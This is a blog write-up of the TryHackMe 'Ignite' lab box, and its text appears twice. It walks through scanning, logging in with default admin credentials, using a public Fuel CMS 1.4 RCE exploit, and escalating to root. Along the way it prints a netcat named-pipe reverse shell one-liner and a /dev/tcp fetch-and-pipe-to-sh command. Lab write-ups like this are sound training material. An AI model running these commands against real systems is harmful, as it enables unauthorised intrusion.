TryHackMe - Ignite

A new start-up has a few issues with their web server.. Let’s start.

1. Ignite

Root the box! Designed and created by DarkStar7471, built by Paradox. Enjoy the room! For future rooms and write-ups, follow @darkstar7471 on Twitter.

1.1 User.txt

Let’s do a nmap scan first.

$ nmap -sSCV -A -O


Only port 80/tcp is open. If we look carefully, there is a directory information in robots.txt. Disallow: /fuel/.


But first, let’s check the website running on port 80. Here is a page like this.


As far as I can see, the fuel cms version 1.4 is used here. There may be a vulnerability in this version, we will check it, but first I want to look at the /fuel/ directory. Let’s go to this directory and see what comes up.


An admin login page appears. By default I tried admin:admin directly and logged in D: I didn’t expect the admin page to be so easy to reach. Let’s see what we find here.


I’m checking every link on the page to see if we can somehow apply a reverse shell. But I couldn’t find anything remarkable. So I searched in exploit-db if we can find a vulnerability about fuel cms v1.4 that we discovered earlier.


We found something important here. I see that we can exploit the RCE vulnerability in 1.4. Let’s take a look at the most recent of them.


I’m downloading the exploit file from here. And now let’s run it.

$ python -u


We log in to the system, and we provide a clearer connection by using one of the pentest monkey’s reverse shells.


First, we set up a netcat listener on our own machine.

$ nc -nlvp 4444

Then we enter the following code on the target machine.

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

And we are inside.


To find user.txt, I first look at the user directories in the /home directory. There is a user and that is www-data. We go in and take the flag right away.

$ ls -la /home
$ ls -la /home/www-data
$ cat /home/www-data/user.txt


1.2 Root.txt

I’m scanning the system with to upgrade privileges.

First, I run the following code in the directory where is located on my own machine.

$ sudo nc -q 5 -lvnp 80 <

Then I run the following code on the target machine.

$ cat < /dev/tcp/ | sh


And it worked. Now we’re waiting to see if we can find anything useful.


Password: ******

We found a password information, but I don’t know what it is for. But let’s try it for root.

First, let’s call a shell using python. Then let’s try logging in.

$ python -c 'import pty; pty.spawn("/bin/bash")'
$ su root
Password: ******

It worked :D. We have successfully rooted.


Now we can get to root.txt let’s get the flag.


It was such a fun CTF. I hope you learned something and had fun too. But that’s it for now till next time take care.

Mr0Wido's Blog

I am passionate about all things technology-related. My thirst for knowledge knows no bounds, and I consider myself a lifelong learner.

I am passionate about all things technology-related. My thirst for knowledge knows no bounds, and I consider myself a lifelong learner.

Mr0Wido's Blog

I am passionate about all things technology-related. My thirst for knowledge knows no bounds, and I consider myself a lifelong learner.

I am passionate about all things technology-related. My thirst for knowledge knows no bounds, and I consider myself a lifelong learner.

TryHackMe - Ignite

A new start-up has a few issues with their web server.. Let’s start.

1. Ignite

Root the box! Designed and created by DarkStar7471, built by Paradox. Enjoy the room! For future rooms and write-ups, follow @darkstar7471 on Twitter.

1.1 User.txt

Let’s do a nmap scan first.

$ nmap -sSCV -A -O


Only port 80/tcp is open. If we look carefully, there is a directory information in robots.txt. Disallow: /fuel/.


But first, let’s check the website running on port 80. Here is a page like this.


As far as I can see, the fuel cms version 1.4 is used here. There may be a vulnerability in this version, we will check it, but first I want to look at the /fuel/ directory. Let’s go to this directory and see what comes up.


An admin login page appears. By default I tried admin:admin directly and logged in D: I didn’t expect the admin page to be so easy to reach. Let’s see what we find here.


I’m checking every link on the page to see if we can somehow apply a reverse shell. But I couldn’t find anything remarkable. So I searched in exploit-db if we can find a vulnerability about fuel cms v1.4 that we discovered earlier.


We found something important here. I see that we can exploit the RCE vulnerability in 1.4. Let’s take a look at the most recent of them.


I’m downloading the exploit file from here. And now let’s run it.

$ python -u


We log in to the system, and we provide a clearer connection by using one of the pentest monkey’s reverse shells.


First, we set up a netcat listener on our own machine.

$ nc -nlvp 4444

Then we enter the following code on the target machine.

$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 4444 >/tmp/f

And we are inside.


To find user.txt, I first look at the user directories in the /home directory. There is a user and that is www-data. We go in and take the flag right away.

$ ls -la /home
$ ls -la /home/www-data
$ cat /home/www-data/user.txt


1.2 Root.txt

I’m scanning the system with to upgrade privileges.

First, I run the following code in the directory where is located on my own machine.

$ sudo nc -q 5 -lvnp 80 <

Then I run the following code on the target machine.

$ cat < /dev/tcp/ | sh


And it worked. Now we’re waiting to see if we can find anything useful.


Password: ******

We found a password information, but I don’t know what it is for. But let’s try it for root.

First, let’s call a shell using python. Then let’s try logging in.

$ python -c 'import pty; pty.spawn("/bin/bash")'
$ su root
Password: ******

It worked :D. We have successfully rooted.


Now we can get to root.txt let’s get the flag.


It was such a fun CTF. I hope you learned something and had fun too. But that’s it for now till next time take care.